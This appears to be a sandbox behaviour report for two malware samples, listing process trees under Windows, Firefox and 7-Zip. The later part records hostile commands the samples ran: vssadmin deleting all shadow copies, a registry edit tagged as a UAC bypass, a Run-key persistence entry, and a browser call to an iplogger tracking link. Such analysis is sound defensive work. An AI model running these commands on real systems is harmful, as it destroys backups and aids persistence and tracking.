C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:1544
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
PID:5984
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:2684
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1000
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:2412
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
PID:5464
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:3708
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4272
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:656
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4200 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:5932
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:4192 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27100 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {cf100be8-2294-4b67-924c-1a28b4bad1f8} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu4⤵PID:4900
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2456 -prefsLen 27136 -prefMapHandle 2460 -prefMapSize 270279 -ipcHandle 2352 -initialChannelId {ea6a6bb9-2061-4fa0-81b9-96aa9f2d07b6} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket4⤵
- Checks processor information in registry
PID:3664
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3872 -prefsLen 27277 -prefMapHandle 3876 -prefMapSize 270279 -jsInitHandle 3880 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3888 -initialChannelId {8cb57d87-1612-4d70-9299-0c7c3e2dd7b0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab4⤵
- Checks processor information in registry
PID:544
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4044 -prefsLen 27277 -prefMapHandle 4048 -prefMapSize 270279 -ipcHandle 4148 -initialChannelId {934fac5d-d6b9-4071-9951-1037fe04c929} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd4⤵PID:3180
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4516 -prefsLen 34776 -prefMapHandle 4520 -prefMapSize 270279 -jsInitHandle 4524 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3104 -initialChannelId {6a3c3fc0-959c-4382-8432-5b332968fe16} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab4⤵
- Checks processor information in registry
PID:4744
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4996 -prefsLen 35013 -prefMapHandle 5000 -prefMapSize 270279 -ipcHandle 5008 -initialChannelId {9646553d-9121-4fe2-8d04-e043c3e815c8} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility4⤵
- Checks processor information in registry
PID:6476
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2736 -prefsLen 32952 -prefMapHandle 2740 -prefMapSize 270279 -jsInitHandle 2744 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4088 -initialChannelId {093b4033-a523-441b-bd2f-0876a43d0606} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab4⤵
- Checks processor information in registry
PID:6916
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4092 -prefsLen 32952 -prefMapHandle 3064 -prefMapSize 270279 -jsInitHandle 3208 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5572 -initialChannelId {8e7b1b81-d775-44bc-85e3-decf504334d0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab4⤵
- Checks processor information in registry
PID:6928
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5680 -prefsLen 32952 -prefMapHandle 5684 -prefMapSize 270279 -jsInitHandle 5688 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3064 -initialChannelId {0a844bbe-c5fc-4dcf-99a9-dadc3204b4b2} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab4⤵
- Checks processor information in registry
PID:6940
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5840 -prefsLen 32952 -prefMapHandle 5844 -prefMapSize 270279 -jsInitHandle 5848 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5856 -initialChannelId {9ae096be-d918-4601-9f32-14ee8fb92ef0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab4⤵
- Checks processor information in registry
PID:6952
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5900 -prefsLen 32952 -prefMapHandle 5904 -prefMapSize 270279 -jsInitHandle 5908 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5916 -initialChannelId {78b4221d-c8fb-4301-99ea-3711501afe2a} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab4⤵
- Checks processor information in registry
PID:6964
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6088 -prefsLen 32952 -prefMapHandle 6092 -prefMapSize 270279 -jsInitHandle 6096 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6104 -initialChannelId {82a4c713-8ca8-421f-81fb-6cfbc8e4de91} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 12 tab4⤵
- Checks processor information in registry
PID:6980
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6300 -prefsLen 32952 -prefMapHandle 6304 -prefMapSize 270279 -jsInitHandle 6308 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6316 -initialChannelId {4599cb2d-c725-4e90-8eaa-9f6f4d11974b} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 13 tab4⤵
- Checks processor information in registry
PID:6992
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6488 -prefsLen 32952 -prefMapHandle 6492 -prefMapSize 270279 -jsInitHandle 6496 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6504 -initialChannelId {59312b7a-b589-47f2-b759-c7b0e5224fd2} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 14 tab4⤵
- Checks processor information in registry
PID:7004
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6676 -prefsLen 32952 -prefMapHandle 6680 -prefMapSize 270279 -jsInitHandle 6684 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6692 -initialChannelId {afb744f3-a5cd-4a76-a2ea-cd3c60ca72e3} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 15 tab4⤵
- Checks processor information in registry
PID:7016
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6864 -prefsLen 32952 -prefMapHandle 6868 -prefMapSize 270279 -jsInitHandle 6872 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6880 -initialChannelId {63085a67-25bf-47c0-b959-7d3e63cd6a8d} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 16 tab4⤵
- Checks processor information in registry
PID:7036
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7076 -prefsLen 32952 -prefMapHandle 7080 -prefMapSize 270279 -jsInitHandle 7084 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7088 -initialChannelId {c081b01e-9395-405b-b414-c81d68a21da6} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 17 tab4⤵PID:7056
-
-
    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7284 -prefsLen 32952 -prefMapHandle 7288 -prefMapSize 270279 -jsInitHandle 7292 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7300 -initialChannelId {74a5be6f-7089-4dd8-a793-e7bd280996e6} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 18 tab
    - Checks processor information in registry
    PID:7068

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7328 -prefsLen 32952 -prefMapHandle 7316 -prefMapSize 270279 -jsInitHandle 7416 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7488 -initialChannelId {d9558668-c643-455b-a073-305d17cf2027} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 19 tab
    - Checks processor information in registry
    PID:7080

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7660 -prefsLen 32952 -prefMapHandle 7664 -prefMapSize 270279 -jsInitHandle 7668 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7676 -initialChannelId {91721b9e-3c1d-4f9d-b530-972ac4cf62c9} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 20 tab
    - Checks processor information in registry
    PID:7092

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7848 -prefsLen 32952 -prefMapHandle 7852 -prefMapSize 270279 -jsInitHandle 7856 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7864 -initialChannelId {68c2e1b8-cdb2-40c0-80a8-3fbd3b9fe732} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 21 tab
    - Checks processor information in registry
    PID:7104

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8036 -prefsLen 32952 -prefMapHandle 8040 -prefMapSize 270279 -jsInitHandle 8044 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8052 -initialChannelId {44f8ba09-8d1b-41c3-ae8a-6f935b52ba8f} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 22 tab
    - Checks processor information in registry
    PID:7116

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8228 -prefsLen 32952 -prefMapHandle 8232 -prefMapSize 270279 -jsInitHandle 8236 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8244 -initialChannelId {56eb42ed-c588-4968-ae13-5426e5cbf55b} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 23 tab
    - Checks processor information in registry
    PID:7128

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8440 -prefsLen 32952 -prefMapHandle 8444 -prefMapSize 270279 -jsInitHandle 8448 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8456 -initialChannelId {347f31cb-dc05-45a1-9e9c-cfcb0520cf3a} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 24 tab
    - Checks processor information in registry
    PID:7152

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8600 -prefsLen 32952 -prefMapHandle 8604 -prefMapSize 270279 -jsInitHandle 8608 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5628 -initialChannelId {68a142d0-e6da-4bd3-899c-c2569c0a692c} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 25 tab
    - Checks processor information in registry
    PID:4224

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5896 -prefsLen 32952 -prefMapHandle 5892 -prefMapSize 270279 -jsInitHandle 6036 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8644 -initialChannelId {0baa711d-8e72-487e-b860-8b6e42b71519} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 26 tab
    - Checks processor information in registry
    PID:3576

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8764 -prefsLen 32952 -prefMapHandle 8768 -prefMapSize 270279 -jsInitHandle 8772 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8776 -initialChannelId {e5de97bf-f7fe-4890-b67f-d106e8431157} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 27 tab
    - Checks processor information in registry
    PID:2496

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8948 -prefsLen 32952 -prefMapHandle 8952 -prefMapSize 270279 -jsInitHandle 8956 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8964 -initialChannelId {b10f0107-0a23-4f05-8108-5774f6e1aab1} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 28 tab
    - Checks processor information in registry
    PID:6060

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7036 -prefsLen 32952 -prefMapHandle 7032 -prefMapSize 270279 -jsInitHandle 7028 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7016 -initialChannelId {07c18d23-d063-4651-b5b1-7a2bbaa160a5} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 29 tab
    - Checks processor information in registry
    PID:4656

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7656 -prefsLen 32952 -prefMapHandle 7632 -prefMapSize 270279 -jsInitHandle 7628 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7620 -initialChannelId {b429cafd-bdfa-4c8c-8539-d5807be5c49d} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 30 tab
    - Checks processor information in registry
    PID:5048

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7604 -prefsLen 32952 -prefMapHandle 7504 -prefMapSize 270279 -jsInitHandle 7516 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7316 -initialChannelId {629840ce-9743-49bd-90e6-2165e5079fde} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 31 tab
    - Checks processor information in registry
    PID:1092

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9312 -prefsLen 32952 -prefMapHandle 9316 -prefMapSize 270279 -jsInitHandle 9320 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9332 -initialChannelId {6d49cf93-407e-430d-b55f-f3b334e11bf0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 32 tab
    - Checks processor information in registry
    PID:4420

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9344 -prefsLen 32952 -prefMapHandle 9348 -prefMapSize 270279 -jsInitHandle 9352 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9364 -initialChannelId {d6577547-e3e4-4cf3-b477-a9a14dbebd2d} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 33 tab
    PID:2416

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9376 -prefsLen 32952 -prefMapHandle 9380 -prefMapSize 270279 -jsInitHandle 9384 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9396 -initialChannelId {e776b697-df1c-4a1d-812d-7309cb88b64e} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 34 tab
    - Checks processor information in registry
    PID:4184

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9880 -prefsLen 32952 -prefMapHandle 9884 -prefMapSize 270279 -jsInitHandle 9888 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9896 -initialChannelId {72582720-248b-4daa-b2a7-b64694aa2aba} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 35 tab
    - Checks processor information in registry
    PID:4768

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9908 -prefsLen 32952 -prefMapHandle 9912 -prefMapSize 270279 -jsInitHandle 9916 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9928 -initialChannelId {8d2cf194-9c33-46cd-aeb3-d22eb2e88bd8} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 36 tab
    - Checks processor information in registry
    PID:2468

    C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9940 -prefsLen 32952 -prefMapHandle 9944 -prefMapSize 270279 -jsInitHandle 9948 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9956 -initialChannelId {31a6a4b3-960f-4aaf-878c-7208dc251229} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 37 tab
    - Checks processor information in registry
    PID:1664

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\" -ad -an -ai#7zMap30351:190:7zEvent13546
PID:4348

C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe
"C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe"
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6212

  C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
  "C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" "/rC:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe"
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  PID:7272

    C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
    "C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w00000240
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6252

      C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
      "C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w00000240
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      PID:7060

        C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
        "C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w00000240
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        PID:7656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
PID:6268

  C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
  C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7276

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\" -ad -an -ai#7zMap21626:190:7zEvent4642
PID:7484

C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe
"C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe"
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:5852

  C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
  - System Location Discovery: System Language Discovery
  PID:29032

    C:\Windows\SysWOW64\reg.exe
    C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:29384

  C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
  - System Location Discovery: System Language Discovery
  PID:29040

  C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
  - System Location Discovery: System Language Discovery
  PID:29352

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/2De1W6
  PID:29412

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument https://iplogger.com/2De1W6
    PID:29428

C:\Program Files\7-Zip\7zG.exe
